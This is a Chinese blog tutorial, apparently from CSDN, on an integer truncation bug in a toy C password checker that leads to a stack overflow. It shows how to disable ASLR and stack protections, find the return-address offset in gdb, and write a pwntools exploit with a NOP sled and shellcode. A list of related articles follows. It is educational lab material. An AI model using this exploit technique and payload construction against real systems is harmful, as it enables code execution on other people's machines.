整数溢出漏洞

已于 2022-03-21 11:23:26 修改
阅读量1.5k 收藏 1
点赞数
分类专栏: bin 文章标签: 安全
于 2022-03-18 23:22:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ga4ra/article/details/123586903
版权
本文详细介绍了如何利用栈溢出漏洞进行缓冲区溢出攻击,通过一个C语言程序实例展示了溢出过程。在无ASLR、NX保护的情况下,通过pwntools构造payload,尝试覆盖返回地址执行shellcode。然而,由于 ebx-0x7f9dcb5f 地址无写权限导致执行失败。最终通过调整shellcode,成功触发了程序行为,但出现了Segmentation fault。
摘要由CSDN通过智能技术生成

文章目录


本想借这类老洞练练pwntool,但最后的脚本getshell失败了。

整数的异常情况主要有三种:

  1. 溢出:针对有符号数。两正或两负相加时,有可能改变符号位的值。可用溢出标志 OF 检测。
  2. 回绕:针对无符号数。以byte为例,其实就是0-1, 255+1。可用进位标志 CF 检测。
  3. 截断: 将一个较大宽度的数存入一个宽度小的操作数中,高位发生截断。

实例

#include<stdio.h>
#include<string.h>

void validate_passwd(char *passwd) {
    char passwd_buf[11];
    unsigned char passwd_len = strlen(passwd);  // unsigned char( len== 1) <-- size_t( len== 4) !!!!
    // printf("%s\n%d\n", passwd, passwd_len);
    if(passwd_len >= 4 && passwd_len <= 8) {
        printf("good!\n");
        strcpy(passwd_buf, passwd);
    } else {
        printf("bad!\n");
    }
}

int main(int argc) {
    char buf[300] = {0};
    scanf("%s", buf);
    getchar();
    validate_passwd(buf);
    printf("return main\n");
}

这段程序把输入的passwd四字节长度存到一字节char中,会导致截断。如果想执行strcpy,长度可以被截断为4到8这个闭合区间,比如5,那么可以输入一个长256+5==261的字符串(+1是因为0),这里用pwntools的cyclic生成字符串,方便定位返回地址。

编译(无canary,无NX)并关闭ASLR:

sudo bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space'
gcc -m32 -g -fno-stack-protector -no-pie -z execstack  pwnme.c -o integar
checksec integar
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE

gdb调试:

 gdb --args ./integar `python -c 'from pwn import *;print(cyclic(261))'`

程序按照预期崩溃, 并且返回地址被覆盖为"gaaa":

gef> c
Continuing.
good!

$eip   : 0x61616167 ("gaaa"?)
segmentation fault

重新单步调试到strcpy,可以看到局部变量passwd_buf位于ebp-0x14这个地方,而返回地址应该在ebp+4,距离正好是gaaa与aaa的距离(0x18==4*6)。另外eflag寄存器的overflow标志也提示有溢出了(就不截图了)。

而函数的ebp为0xffffd2e8,

-registers
...
$ebp   : 0xffffd2e8
-code
0x565555c1 <validate_passwd+68> push   DWORD PTR [ebp+0x8]
0x565555c4 <validate_passwd+71> lea    eax, [ebp-0x14]
0x565555c7 <validate_passwd+74> push   eax
0x565555c8 <validate_passwd+75> call   0x565553f0 <strcpy@plt>
─stack
0xffffd2d0│+0x0000: 0xf7fb6000  →  0x001d4d8c    ← $esp
0xffffd2d4│+0x0004: 0xf7fb6000  →  0x001d4d8c
0xffffd2d8│+0x0008: 0x00000000
0xffffd2dc│+0x000c: 0x05e1139b
0xffffd2e0│+0x0010: 0xf7fb63fc  →  0xf7fb7200  →  0x00000000
0xffffd2e4│+0x0014: 0x00000000
0xffffd2e8│+0x0018: 0xffffd308  →  0x00000000    ← $ebp
0xffffd2ec│+0x001c: 0x56555636  →  <main+76> add esp, 0x10

接下来构造exp。先看下shellcode的长度:

>>> len(asm(shellcraft.i386.sh()))
44

返回地址可以写一个ebp之后的、4字节对齐的地址,执行一段滑块指令后再执行shellcode:

from pwn import *
pRetAddr = 0xffffd2f8   # a address higher than ebp(0xffffd2e8)

context.log_level = 'debug'

# shellcode = shellcraft.i386.linux.sh()
shellcode = shellcraft.echo('hello', 1)

payload = bytes("a"*24, encoding="ascii")    # aaaa-faaa  4*6
payload += p32(pRetAddr)   # 4   
payload += bytes([0x90]*20)   # 8
payload += asm(shellcode)   # 22
payload += bytes("a"*(261-len(payload)), encoding="ascii")

# p = process(["./integar"])
# p.sendline(payload)
# gdb.attach(p, "b main")

p = gdb.debug("./integar", "b main")
pause()
p.sendline(payload)
# p.sendline(b'echo Hello')
print(p.recv())
p.interactive()

一开始 shellcode是用的 linux.sh, 但经过调试发现字符串被00截断了:

p passwd_len
$1 = 0x3d

x /261xb passwd
0xffffd474:	0x61	0x61	0x61	0x61	0x61	0x61	0x61	0x61
0xffffd47c:	0x61	0x61	0x61	0x61	0x61	0x61	0x61	0x61
0xffffd484:	0x61	0x61	0x61	0x61	0x61	0x61	0x61	0x61
0xffffd48c:	0xf8	0xd2	0xff	0xff	0x90	0x90	0x90	0x90
0xffffd494:	0x90	0x90	0x90	0x90	0x90	0x90	0x90	0x90
0xffffd49c:	0x90	0x90	0x90	0x90	0x90	0x90	0x90	0x90
0xffffd4a4:	0x6a	0x68	0x68	0x2f	0x2f	0x2f	0x73	0x68
0xffffd4ac:	0x2f	0x62	0x69	0x6e	0x6a	0x00	0x00	0x00

先不编码了,改为简单的echo hello,

/* push b'hello' */
push 0x6f
push 0x6c6c6568
/* call write(1, 'esp', 5) */
push (4) /* 4 */
pop eax
push 1
pop ebx
mov ecx, esp
push 5
pop edx
int 0x80

最后成功在0xffffd2f8执行了,但并没有echo,,反而Segmentation fault结束了:

→ 0xffffd30b                  add    BYTE PTR [ebx-0x7f9dcb5f], ah
   0xffffd311                  ins    DWORD PTR es:[edi], dx
   0xffffd312                  sti    
   0xffffd313                  test   DWORD PTR [esi], 0x70000000
   0xffffd319                  xchg   ecx, eax
   0xffffd31a                  push   ebp
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "integar", stopped 0xffffd30b in ?? (), reason: SIGSEGV
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0xffffd30b → add BYTE PTR [ebx-0x7f9dcb5f], ah
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
0xffffd30b in ?? ()
gef➤  ni

Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.

原因是ebx-0x7f9dcb5f这里没有写权限,应该是shellcode的问题。

当天没解决,,但第二天就正常了(奇了个大怪),,,

[DEBUG] Received 0xb bytes:
    b'good!\n'
    b'hello'
good!
hello$

小结:

  • python3的payload构造,拼接时要转成byte类型;
  • 研究了一下pwntool的gdb调试,调试会话建立后需要pause一下,需要输入时再发送payload。
CodeStarr
关注
专栏目录
Java常见漏洞——整数溢出漏洞、硬编码密码漏洞、不安全的随机数生成器
m0_61506558的博客
11-30 2040
(一)整数溢出漏洞(一)整数溢出漏洞计算机程序中的整数都是有范围的,不同的数据类型范围也不同,这是由编译器决定的,超过这个范围就有可能会出现整数溢出的情况。比如说Java 的int是32位有符号整数类型,其最大值是,最小值是0x80000000,即int表示的数的范围是在-~之间。当int类型的运算结果超出了这个范围时则发生了溢出,而且不会有任何异常抛出。整数溢出一般可以分为上界溢出和下界溢出两种。0x01 整数溢出漏洞介绍1.1上界溢出
PHP5.5.9整数溢出漏洞
qq_53099802的博客
05-26 2744
php5.5.9整数溢出漏洞
安全漏洞』Windows 云同步引擎API整数溢出漏洞
HBohan的博客
11-18 1339
随着云存储的普及,各种操作系统都添加了支持此类存储的服务和功能。现在可以在云端同步本地存储,同时也可以在系统上检索到问价。在 Windows 上,这种功能是通过Cloud Sync Engines云同步引擎完成的。该组件公开了一个 Cloud Filter API 的本机 API。该API实现可在 Cloud Files Mini Filter Driver 或 cldflt.sys 中找到。本文介绍了有关此驱动程序中的整数下溢漏洞的一些详细信息,该漏洞的编号为CVE-2021-31969 / ZDI-21
安全漏洞--整数溢出漏洞(IOV)分析
关注互联网安全的小虾米一枚
04-19 1万+
漏洞简介         整数溢出漏洞(integer overflow):在计算机中,整数分为无符号整数以及有符号整数两种。其中有符号整数会在最高位用0表示正数,用1表示负数,而无符号整数则没有这种限制。另外,我们常见的整数类型有8位(单字节字符、布尔类型)、16位(短整型)、32位(长整型)等。关于整数溢出,其实它与其它类型的溢出一样,都是将数据放入了比它本身小的存储空间中,从而出现了溢出。由此引发的一切程序漏洞
逆向之整数溢出漏洞
菜鸟-传奇
04-26 509
逆向之整数溢出漏洞 溢出漏洞的简介 溢出漏洞的概念:   溢出是黑客利用程序的漏洞,专门开发的一种程序,加相应的参数运行后,就可以达到某种目的。溢出是程序设计者设计时的不足所带来的错误 溢出的类型:   溢出分为缓冲区溢出、 内存溢出、数据溢出整数的概念 整数的分类:   在计算机中,整数分为无符号整数以及有符号整数两种 数据在计算机中的存储方式:   数据在计算机中的存储方...
整数溢出漏洞和格式化字符串漏洞
AlexYoung28的博客
10-29 6635
漏洞成因: 在计算机中,整数类型分为无符号整数和有符号整数 两种。 有符号整数会在最高位用0表示正数,1表示负 数,而无符号整数则没有这种规则。 常见的整数类型有8位(单字节字符类型、布尔类型)、 16位(短整型)、32位(长整型)等。 当一个整数存入了比它本身小的存储空间中,超出了 数据类型所能表示的范围时,就会发生整数溢出。 1. 基础知识 整数数据类型 数据类型 : ...
PHP5.2下chunk_split()函数整数溢出漏洞 分析
10-30
但是,在处理畸形参数时,该函数存在整数溢出漏洞。 chunk_split() 函数的实现位于 ext/standard/string.c 文件中,函数的签名为: ```c char *php_chunk_split(char *src, int srclen, char *end, int endlen, int...
Linux kernel ip_setsockopt()整数溢出漏洞.pdf
09-07
《Linux内核ip_setsockopt()整数溢出漏洞详解》 Linux内核中的ip_setsockopt()函数是网络编程中的关键部分,负责处理IP套接字选项。然而,在特定版本的Linux内核中,该函数存在一个整数溢出漏洞,这为远程攻击者...
Google Chrome Skia整数溢出漏洞
05-05
Google Chrome Skia整数溢出漏洞
整型溢出漏洞
热门推荐
ATFWUS的博客
03-02 2万+
目录 0x01.整型在计算机系统中的相关知识 0x02. 上界溢出和下界溢出 上界溢出: 下界溢出: 0x03.漏洞利用 0x01.整型在计算机系统中的相关知识 在计算机中,整数类型分为无符号整数和有符号整数 两种。 有符号整数会在最高位用0表示正数,1表示负 数,而无符号整数则没有这种规则。因为计算机只认得二进制,认不得符号。 无符号的汇编代码是对内存进行加法运算. 在计算机...
【软件与系统安全整数溢出、格式化字符串、数组越界访问漏洞
kkzzjx
05-20 1545
文章目录一、整数溢出整数表示举例防护二、格式化字符串漏洞三、数组越界访问漏洞产生举例 一、整数溢出 整数表示 原码、反码、补码表示: 对于正数原码、反码以及补码是其本身。负数的原码是其本身,反码是对原码除符号位之外的各位取反,补码则是反码加1。 CF是无符号溢出标志,OF是有符号溢出标志。即使有符号数相加/相减导致了CF=1也没什么意义,不能说明结果的正确与否。此时,OF=1,则说明结果溢出,出现错误;OF=0,说明结果正确。这个过程根本和CF没关系,CF=1/0,都不会影响。 这说明指针类型不同,对
CTF PWN-攻防世界Overflow整数溢出漏洞
道阻且长,行则将至。
07-29 1886
本文学习了缓冲区溢出漏洞常见的一种场景:整数溢出。一旦不认真考虑整数变量的范围,此类漏洞缺陷很容易在程序员的编码过程中发生,这也是安全工作人员需要注意审计的地方。
【业务逻辑漏洞整数溢出
wj33333的博客
11-27 960
整数溢出是一种常见的编程错误,它发生在将一个数值转换成超过其最大值或最小值所能表示范围内的另一个数值时。这可能会导致程序崩溃或产生不正确的结果。在业务逻辑漏洞中,整数溢出也是一个常见的问题。例如,如果一个程序需要处理大量的数据,而没有正确地处理整数溢出的情况,则可能会引发安全问题。例如,攻击者可能会利用整数溢出来绕过访问控制、操纵数据或改变程序的行为。2147483647是一个典型的整数溢出的例子。这是一个32位整数的极限值,因为它超过了该类型的最高有效值(0x7FFFFFFF),因此会产生溢出
二进制漏洞原理--整型溢出漏洞
qq_40410406的博客
11-13 1177
1
基于代币智能合约整数溢出漏洞的建模与验证
07-07
针对代币智能合约的安全问题,提岀一种基于代币智能合约整数溢岀漏洞的形式化建模与验证方法。分析现有Thedao和BEC等漏洞攻击...实验结果表明,该方法能成功找岀代币智能合约的整数溢出漏洞,并且具有较强的通用性。
CVE-2017-7529 Nginx整数溢出漏洞分析
weixin_34315189的博客
09-13 1649
本文讲的是CVE-2017-7529 Nginx整数溢出漏洞分析, 1、漏洞描述 在Nginx的range filter中存在整数溢出漏洞,可以通过带有特殊构造的range的HTTP头的恶意请求引发这个整数溢出漏洞,并导致信息泄露。 2、影响程度 攻击成本 低 危害程度 低 影响范围 Nginx 0.5.6 – 1.13.2 3 、漏洞...
整数溢出漏洞危害和预防
JinxMow的博客
12-17 2481
智能合约作为区块链2.0的代表技术,适应于区块链去中心化、分布式的特点, 具有独立运行、不可篡改的优良特性,可用于实现包含金融工具在内的各类分布式应用。开发者可以自行定义交易逻辑并开发代码发布到链上,合约代码在矿工节点的虚拟机环境(如EVM)中执行。合约交易被打包进区块后,链上节点执行相同代码,从而同步改变链上数据状态。故合约的多方参与者无需建立信任,也无法相互欺骗。 合约运行在区块链节点中,具有...
漏洞技术分析实践_整数溢出
最新发布
kitsch0x97的博客
10-25 524
整数溢出漏洞发生在当整数存储超出其数据类型所能表示的范围时。主要原因在于计算机中的整数类型分为有符号整数和无符号整数。有符号整数使用最高位来表示正负号:0 表示正数,1 表示负数,而无符号整数没有这个规则。常见的整数类型有 8 位、16 位和 32 位等。整数溢出通常发生在存储的值超出了该类型可表示的范围时,从而导致数据异常和潜在的安全漏洞
整数溢出
wuxiaobingandbob的专栏
11-20 5595
http://blog.csdn.net/habla/article/details/1834658 整数溢出也是一种常见的软件漏洞,由此引发的bug可能比格式化字符串缺陷和缓冲区溢出缺陷更难于发现。前几天solaris系统中就爆出被人发现了一个整数溢出漏洞。在这里我们来翻译phrack杂志上的一篇关于整数溢出的文章,写得相当详细。平时时间不是很多,所以我不会一次把这篇文章全部翻译后才b
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值